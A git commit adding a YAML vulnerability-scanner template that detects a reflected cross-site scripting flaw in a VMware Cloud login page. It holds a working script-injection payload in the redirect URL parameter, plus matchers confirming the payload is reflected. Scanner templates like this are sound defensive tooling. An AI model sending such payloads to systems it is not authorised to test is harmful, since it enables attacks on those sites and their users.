Create vmware-cloud-reflected-xss.yaml

patch-1
Arman 2023-01-23 13:39:37 -05:00 committed by GitHub
parent 1815650540
commit 7d98d173ad
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 33 additions and 0 deletions

View File

@ -0,0 +1,33 @@
id: vmware-cloud-reflected-xss
info:
name: VMWare Cloud - Cross Site Scripting
author: tess
severity: medium
metadata:
verified: true
tags: vmware,xss
requests:
- method: GET
path:
- '{{BaseURL}}/login/?redirectTo=/tenant/e&service=</script><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
- 'let tokens ='
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200